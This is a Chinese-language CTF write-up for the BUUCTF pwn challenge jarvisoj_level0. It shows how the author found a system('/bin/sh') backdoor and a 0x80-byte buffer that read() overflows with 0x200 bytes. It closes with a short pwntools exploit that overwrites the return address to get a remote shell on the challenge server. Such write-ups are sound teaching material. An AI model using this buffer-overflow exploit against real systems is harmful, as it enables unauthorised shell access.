[BUUCTF]PWN8——jarvisoj_level0

[BUUCTF]PWN8——jarvisoj_level0

题目网址:https://buuoj.cn/challenges#jarvisoj_level0

步骤:
例行检查,64位,开启了NX保护
在这里插入图片描述
nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入
在这里插入图片描述
用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh
在这里插入图片描述
双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596
在这里插入图片描述
根据之前nc看到的字符串,找到了输入点,ida给我们分析出来buf的大小是0x80,这边read读入0x200,可以造成溢出,覆盖返回地址为后门地址既可完成利用
在这里插入图片描述

exp

from pwn import*

r=remote('node3.buuoj.cn',25946)
payload='a'*(0x80+8)+p64(0x400596)
r.sendline(payload)
r.interactive()

在这里插入图片描述

原文地址:https://www.cnblogs.com/xlrp/p/14273726.html